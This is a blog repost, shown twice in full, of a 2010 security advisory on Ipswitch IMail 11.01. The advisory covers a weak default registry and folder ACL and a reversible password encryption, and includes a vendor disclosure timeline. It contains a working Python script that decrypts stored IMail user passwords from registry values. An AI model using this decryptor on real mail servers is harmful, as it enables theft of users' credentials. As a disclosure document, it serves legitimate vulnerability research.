Ipswitch IMAIL 11.01 multiple vulnerabilities (reversible encryption + weak ACL)

最新推荐文章于 2024-09-20 10:59:56 发布
最新推荐文章于 2024-09-20 10:59:56 发布
阅读量860 收藏
点赞数
文章标签: encryption server microsoft reference passwords 2010

|------------------------------------------------------------------|
| __ __ |
| _________ ________ / /___ _____ / /____ ____ _____ ___ |
| / ___/ __ // ___/ _ // / __ `/ __ / / __/ _ // __ `/ __ `__ / |
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |
| /___//____/_/ /___/_//__,_/_/ /_/ /__//___//__,_/_/ /_/ /_/ |
| |
| http://www.corelan.be:8800 |
| |
|-------------------------------------------------[ EIP Hunters ]--|

Advisory : CORELAN-10-009
Disclosure Date : Feb 4th, 2010

0x00 : Vulnerability Information

[+] Product : IMail Server
[+] Version : 11.01
[+] Vendor : Ipswitch
[+] URL : http://www.ipswitch.com/
[+] Platform : Windows
[+] Issue fix: No
[+] Vulnerability discovered by: sinn3r
[+] Greetings to: Corelan Security Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me/ekse/sinn3r/Jacky/jn
z;
and all the guys with secret identities at exploit-db.com :-p
[+] Special thanks to: Jason from Ipswitch

0x01 : Vendor Description of Software

"The Award-winning IMail Server is a proven email messaging solution for small and mid-sized businesses.
Reliable, scalable and versatile, IMail Server is an affordable choice that meets the messaging needs
of small and medium sized businesses. Unlike complicated and more expensive messaging solutions, IMail
Server delivers a quick and easy installation. As a scalable, standards-based, email server with Webmail,
optional integration with Microsoft Exchange ActiveSync(r), SMTP, POP, IMAP, LDAP, and List Server, IMail
users can send and receive email using any standards-based client, including Microsoft Outlook(r),
Outlook Express(r), or Eudora(r). Or, users can access email from anywhere via IMail's customizable Web
messaging, available in eight languages.

Designed to place minimal ongoing maintenance burden on network administrators, IMail can authenticate
users from its own database, an active directory database, or from any ODBC-compliant data store, making
life easier for the busy administrator. IMail Server also delivers a quick and easy installation or upgrade
process."

0x02 : Vulnerability Details

1. By default, IMail allows Internet Guest Account to have "Full Control" to the following registry key,
including its subkeys and values. As well as the default IMail directory:
HKEY_LOCAL_MACHINE/SOFTWARE/Ipswitch/IMail
C:/Program Files/Ipswitch/IMail
2. The IMail password decryption algorithm implemented in IMailsec.dll is also reversible.

0x03 : Vendor Communication

1/21/2010 - IMail vendor contacted
1/26/2010 - Got a reply from the vendor (product development manager) for more vulnerability clarification.
No fix yet.
2/02/2010 - Received another reply from the vendor: Issues logged for additional research. No plans for
immediate changes. A public advisory was also suggested by the vendor as reference in their
tech/KB article.
2/04/2010 - Public disclosure: Advisory created. Vendor informed.

0x04 : Exploit/Proof-of-Concept

#!/usr/bin/python

########################################################################
##
# Ipswitch IMail Server - IMAP4 Server (IMail 11.01) Password Decryptor
# Tested on: Windows XP SP3 (Windows version does not matter)
# Description:
# So I reverse engineered the IMail password decryption function in
# IMailsec.dll, located at 0x00563130.
#
# In order to decrypt correctly, you must have the correct username,
# because it is used as a key.
#
# All usernames and passwords are stored in registry, which can be
# found at:
# HKEY_LOCAL_MACHINE/SOFTWARE/Ipswitch/IMail/Domains/[domain name]/Users
# Every registry key under "Users" has a string value named "Password",
# in there you'll find the encrypted password.
#
# By default, Internet Guest Account is granted with "Full Control" to
# the IMail registry, and its directory. That means if an attacker
# manages to gain code execution (ie.via a web app bug), IMail can be
# his/her next playground. And IMail users may not be safe.
#
# Demo:
# sinn3r@bt4:~$ ./iMailDecrypt.py admin C8D3D19AA094
# Ipswitch IMail Server - IMAP4 Server (IMail 11.01) Password Decryptor
# coded by sinn3r - x90.sinner{at}gmail.c0m
# [*] Password = god123
#
# Responsible Disclosure Timeline:
# 1/21/2010 - IMail vendor contacted
# 1/26/2010 - Got a reply from the vendor for more vulnerability
# clarfication. No fix yet.
# 2/02/2010 - Received another reply from the vendor: Issues logged for
# additional research. No plans for immediate changes.
# A public advisory was also suggested by the vendor as
# reference in their tech/KB article.
# 2/04/2010 - Public Disclosure. Vendor informed again.
########################################################################
##

import sys
import binascii

## Convert the encrypted string to integers for calculation
## Returns the integer version as a list
def convertToInt(data):
charset = []
for char in (data):
tmp = char.encode("hex")
tmp = int(tmp, 16)
charset.append(tmp)
return charset

## Decrypt the password
## Returns the decrypted version as a list
def decryptPassword(intUsername, intPassword):
results = []
counter = 0
counter2 = 0
pwdLength = len(intPassword)
while counter<pwdLength:
firstByte = intPassword[counter]
if firstByte <= 57: #0x39
firstByte -= 48 #0x30
else:
firstByte -= 55 #0x37
firstByte *= 16 #SHL 0x40
secondByte = intPassword[counter+1]
if secondByte <= 57: #0x39
secondByte -= 48 #0x30
else:
secondByte -= 55 #0x37
tmp = firstByte + secondByte

if len(intUsername) <= counter2:
counter2 = 0

if intUsername[counter2] > 54: #0x41
if intUsername[counter2] < 90: #5A
intUsername[counter2] += 32 #0x20

tmp -= intUsername[counter2]
counter2 += 1

results.append(hex(tmp)[2:])
counter += 2
return results

banner = """Ipswitch IMail Server - IMAP4 Server (IMail 11.01) Password Decryptor
coded by sinn3r - x90.sinner{at}gmail{d0t}c0m"""

print banner

if len(sys.argv) == 3:
if len(sys.argv[2]) % 2 == 0:
username = convertToInt(sys.argv[1])
password = convertToInt(sys.argv[2])
decryptor = str("".join(decryptPassword(username, password)))
print "[*] Password = %s" %binascii.unhexlify(decryptor)
else:
print "[*] Incorrect Encrypted password length"
else:
print "[*] Usage: %s <username> <encrypted password>" %sys.argv[0]

|------------------------------------------------------------------|

| __ __ |

| _________ ________ / /___ _____ / /____ ____ _____ ___ |

| / ___/ __ // ___/ _ // / __ `/ __ / / __/ _ // __ `/ __ `__ / |

| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |

| /___//____/_/ /___/_//__,_/_/ /_/ /__//___//__,_/_/ /_/ /_/ |

| |

| http://www.corelan.be:8800 |

| |

|-------------------------------------------------[ EIP Hunters ]--|

Advisory : CORELAN-10-009

Disclosure Date : Feb 4th, 2010

0x00 : Vulnerability Information

[+] Product : IMail Server

[+] Version : 11.01

[+] Vendor : Ipswitch

[+] URL : http://www.ipswitch.com/

[+] Platform : Windows

[+] Issue fix: No

[+] Vulnerability discovered by: sinn3r

[+] Greetings to: Corelan Security Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me/ekse/sinn3r/Jacky/jn
z;

and all the guys with secret identities at exploit-db.com :-p

[+] Special thanks to: Jason from Ipswitch

0x01 : Vendor Description of Software

"The Award-winning IMail Server is a proven email messaging solution for small and mid-sized businesses.

Reliable, scalable and versatile, IMail Server is an affordable choice that meets the messaging needs

of small and medium sized businesses. Unlike complicated and more expensive messaging solutions, IMail

Server delivers a quick and easy installation. As a scalable, standards-based, email server with Webmail,

optional integration with Microsoft Exchange ActiveSync®, SMTP, POP, IMAP, LDAP, and List Server, IMail

users can send and receive email using any standards-based client, including Microsoft Outlook®,

Outlook Express®, or Eudora®. Or, users can access email from anywhere via IMail's customizable Web

messaging, available in eight languages.

Designed to place minimal ongoing maintenance burden on network administrators, IMail can authenticate

users from its own database, an active directory database, or from any ODBC-compliant data store, making

life easier for the busy administrator. IMail Server also delivers a quick and easy installation or upgrade

process."

0x02 : Vulnerability Details

1. By default, IMail allows Internet Guest Account to have "Full Control" to the following registry key,

including its subkeys and values. As well as the default IMail directory:

HKEY_LOCAL_MACHINE/SOFTWARE/Ipswitch/IMail

C:/Program Files/Ipswitch/IMail

2. The IMail password decryption algorithm implemented in IMailsec.dll is also reversible.

0x03 : Vendor Communication

1/21/2010 - IMail vendor contacted

1/26/2010 - Got a reply from the vendor (product development manager) for more vulnerability clarification.

No fix yet.

2/02/2010 - Received another reply from the vendor: Issues logged for additional research. No plans for

immediate changes. A public advisory was also suggested by the vendor as reference in their

tech/KB article.

2/04/2010 - Public disclosure: Advisory created. Vendor informed.

0x04 : Exploit/Proof-of-Concept

#!/usr/bin/python

########################################################################
##

# Ipswitch IMail Server - IMAP4 Server (IMail 11.01) Password Decryptor

# Tested on: Windows XP SP3 (Windows version does not matter)

# Description:

# So I reverse engineered the IMail password decryption function in

# IMailsec.dll, located at 0x00563130.

#

# In order to decrypt correctly, you must have the correct username,

# because it is used as a key.

#

# All usernames and passwords are stored in registry, which can be

# found at:

# HKEY_LOCAL_MACHINE/SOFTWARE/Ipswitch/IMail/Domains/[domain name]/Users

# Every registry key under "Users" has a string value named "Password",

# in there you'll find the encrypted password.

#

# By default, Internet Guest Account is granted with "Full Control" to

# the IMail registry, and its directory. That means if an attacker

# manages to gain code execution (ie.via a web app bug), IMail can be

# his/her next playground. And IMail users may not be safe.

#

# Demo:

# sinn3r@bt4:~$ ./iMailDecrypt.py admin C8D3D19AA094

# Ipswitch IMail Server - IMAP4 Server (IMail 11.01) Password Decryptor

# coded by sinn3r - x90.sinner{at}gmail.c0m

# [*] Password = god123

#

# Responsible Disclosure Timeline:

# 1/21/2010 - IMail vendor contacted

# 1/26/2010 - Got a reply from the vendor for more vulnerability

# clarfication. No fix yet.

# 2/02/2010 - Received another reply from the vendor: Issues logged for

# additional research. No plans for immediate changes.

# A public advisory was also suggested by the vendor as

# reference in their tech/KB article.

# 2/04/2010 - Public Disclosure. Vendor informed again.

########################################################################
##

import sys

import binascii

## Convert the encrypted string to integers for calculation

## Returns the integer version as a list

def convertToInt(data):

charset = []

for char in (data):

tmp = char.encode("hex")

tmp = int(tmp, 16)

charset.append(tmp)

return charset

## Decrypt the password

## Returns the decrypted version as a list

def decryptPassword(intUsername, intPassword):

results = []

counter = 0

counter2 = 0

pwdLength = len(intPassword)

while counter<pwdLength:

firstByte = intPassword[counter]

if firstByte <= 57: #0x39

firstByte -= 48 #0x30

else:

firstByte -= 55 #0x37

firstByte *= 16 #SHL 0x40

secondByte = intPassword[counter+1]

if secondByte <= 57: #0x39

secondByte -= 48 #0x30

else:

secondByte -= 55 #0x37

tmp = firstByte + secondByte

if len(intUsername) <= counter2:

counter2 = 0

if intUsername[counter2] > 54: #0x41

if intUsername[counter2] < 90: #5A

intUsername[counter2] += 32 #0x20

tmp -= intUsername[counter2]

counter2 += 1

results.append(hex(tmp)[2:])

counter += 2

return results

banner = """Ipswitch IMail Server - IMAP4 Server (IMail 11.01) Password Decryptor

coded by sinn3r - x90.sinner{at}gmail{d0t}c0m"""

print banner

if len(sys.argv) == 3:

if len(sys.argv[2]) % 2 == 0:

username = convertToInt(sys.argv[1])

password = convertToInt(sys.argv[2])

decryptor = str("".join(decryptPassword(username, password)))

print "[*] Password = %s" %binascii.unhexlify(decryptor)

else:

print "[*] Incorrect Encrypted password length"

else:

print "[*] Usage: %s <username> <encrypted password>" %sys.argv[0]

cnbird2008
关注
Imail的安装和配置
fanboy2001的专栏
12-11 3056
1.配置服务器     接着我们就要在自己的破机上开始装一个很牛B的邮件服务器,呵呵,这次我们看中的是 Ipswitch,公司的Imail7.05 这个软件。我们看看某个网站对它的广告就知一二了!(这是一个高性能的,基于标准的SMTP/POP3/IMAP4/LDAP邮件服务器。通过一个简单直观的图形用户界面,非常易于管理。主要特色包括:多域名支持,远程管理,Web邮件,可创建邮递清单(
IMail的安装和设置
srxlmzh的专栏
05-22 2524
〖运行环境〗:NT/2K  〖软件名称〗:IMail Administrator Version 6.04 EVAL  〖软件功能〗:E-mail服务器端软件  〖所属公司〗:Ipswitch Inc.  〖公司网址〗:http://www.ipswitch.com/  〖下载地址〗:PConline软件下载  〖软件类型〗:共享软件(时间限制:三个月)  IMail
IMail SMTP 缓冲区溢出漏洞 (APP,缺陷) (转)
csd3176的博客
12-07 672
IMail SMTP 缓冲区溢出漏洞 (APP,缺陷) (转)[@more@]IMail SMTP 缓冲区溢出漏洞 (APP,缺陷) 涉及程序: SMTP daemon 描述: IMail SMTP 服务器缓冲区溢出导致...
Imail邮件服务器的使用
wthorse的专栏
04-27 5916
第八章:邮件服务器 第一节              单ip 单域名的邮件服务器  本书以imail作为邮件服务器软件,其他的exchangeserver也可以。不过我还是喜欢imail。大家可以去http://www.ipswitch.com/ 下载最新的版本。双击下载的安装文件,即可进行安装。一般的大部分就默认的就够了。但最好加上Imail Password 与 Ima
Ipswitch IMail Server Multiple Local Privilege Escalation Vulnerabilities
cnbird's blog
02-06 532
http://www.securityfocus.com/data/vulnerabilities/exploits/38109.py
IPSwitch IMail Server 2006 SEARCH Remote Stack Overflow Exploit
weixin_34390996的博客
07-26 152
来源:milw0rm #!/use/bin/perl## Ipswitch IMail Server 2006 IMAP SEARCH COMMAND Stack Overflow Exploit# Author: ZhenHan.Liu#ph4nt0m.org# Date: 2007-07-25# Team: Ph4nt0m Security Team ([url]htt...
Imail Server轻松构建局域网邮件服务器
觉醒即是转机,思变为时不晚。
03-20 1059
电子邮件是人们在网上最常使用的通信工具之一,它已经成为我们网络生活中不可或缺的一部分,而其在局域网中也是一项很重要的应用。在局域网中构建一个内部EMAIL服务器,不仅可以大大加快内部公文的传送速度,而且还能大大降低通信费用。今天,我就给大家介绍一下如何利用IMAIL SERVER来构建一台内部EMAIL服务器,在它的帮助下我们就可以轻松获得安全、可靠的邮件服务了。   一、IMAIL的安装
AT91SAM7X256 +RTL8201BL(IPswitch)开发板PROTEL99SE 原理图+PCB DDB工程文件
05-19
AT91SAM7X256 +RTL8201BL(IPswitch)开发板PROTEL99SE 原理图+PCB DDB工程文件,可供学习及设计参考。 AT91SAM7X256 TQFP100 2X10PTS COUDE 1117 ELECTRO1 Electrolytic Capacitor RES2 LED CAP Capacitor ...
vbs imail 密码解密
09-05
2. **注册表路径**:脚本定义了几个关键的注册表路径,如`SOFTWARE\Ipswitch\IMail\Domains`,这些路径包含了IMail的配置信息。 3. **枚举子键**:使用`EnumKey`方法遍历指定键下的所有子键。 4. **获取字符串值**:...
Ipswitch-WhatsUp详细讲解手册.pdf
07-28
Ipswitch WhatsUp Gold详解》 Ipswitch的WhatsUp Gold是一款强大的网络管理软件,旨在为信息管理人员提供全面的网络监控解决方案。该软件详细涵盖了信息管理与解决方案、主机与硬件设备监测、网络服务监控、实时...
Imail密码加密算法及VBS实现
09-06
HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\IMail\Domains\<DOMAINNAME>\Users\ 其中,DOMAINNAME表示域名,USERNAME表示用户名。在USERNAME对应的键值下,有一个名为Password的键值用于存储加密后的密码。由于注册表中...
移植Linux:如何制作rootfs?
zhouwu_linux的专栏
09-20 1000
基于Linux内核,制作rootfs文件过程的方法。
海外云市场分析
沪漂的IT大叔
09-20 859
中国企业出海趋势必然,在出海过程中,线上数字化会是第一步,而选择云服务成为了一项重要工作, 寒冰云从业10多年,以全面视角帮助大家了解海外云。
基于SpringBoot仿天猫购物系统.zip(毕设&课设&实训&大作业&竞赛&项目)
09-20
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全领域),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(如有)等。答辩评审平均分达到96分,放心下载使用!可轻松复现,设计报告也可借鉴此项目,该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 【提供帮助】:有任何使用问题欢迎随时与我联系,我会及时解答解惑,提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【项目价值】:可用在相关项目设计中,皆可应用在项目、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面,可借鉴此优质项目实现复刻,设计报告也可借鉴此项目,也可基于此项目来扩展开发出更多功能 下载后请首先打开README文件(如有),项目工程可直接复现复刻,如果基础还行,也可在此程序基础上进行修改,以实现其它功能。供开源学习/技术交流/学习参考,勿用于商业用途。质量优质,放心下载使用。
Python网络爬虫与推荐算法新闻推荐平台(毕设&课设&实训&大作业&竞赛&项目)
最新发布
09-20
Python网络爬虫与推荐算法新闻推荐平台:网络爬虫:通过Python实现新浪新闻的爬取,可爬取新闻页面上的标题、文本、图片、视频链接(保留排版) 推荐算法:权重衰减+标签推荐+区域推荐+热点推荐.zip项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全领域),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(如有)等。答辩评审平均分达到96分,放心下载使用!可轻松复现,设计报告也可借鉴此项目,该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 【提供帮助】:有任何使用问题欢迎随时与我联系,我会及时解答解惑,提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【项目价值】:可用在相关项目设计中,皆可应用在项目、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面,可借鉴此优质项目实现复刻,设计报告也可借鉴此项目,也可基于此项目来扩展开发出更多功能 下载后请首先打开README文件(如有),项目工程可直接复现复刻,如果基础还行,也可在此程序基础上进行修改,以实现其它功能。供开源学习/技术交流/学习参考,勿用于商业用途。质量优质,放心下载使用。
THUCNews数据集
09-20
THUCNews数据集
Q音:Vue3+Pinia+Vue Router4+Vant4的移动端仿抖音短视频项目.zip(毕设&课设&实训&大作业&竞赛&
09-20
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全领域),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(如有)等。答辩评审平均分达到96分,放心下载使用!可轻松复现,设计报告也可借鉴此项目,该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 【提供帮助】:有任何使用问题欢迎随时与我联系,我会及时解答解惑,提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【项目价值】:可用在相关项目设计中,皆可应用在项目、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面,可借鉴此优质项目实现复刻,设计报告也可借鉴此项目,也可基于此项目来扩展开发出更多功能 下载后请首先打开README文件(如有),项目工程可直接复现复刻,如果基础还行,也可在此程序基础上进行修改,以实现其它功能。供开源学习/技术交流/学习参考,勿用于商业用途。质量优质,放心下载使用。
IMail8-2初学者指南:安装与入门
IMail8-2 Getting Started Guide 是一个针对Ipswitch公司的IMail Server软件的入门手册,适用于版本8.2。这个指南是安装和使用IMail Server的必读资料,为用户提供初步了解和设置该邮件服务器所需的基本步骤和信息。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值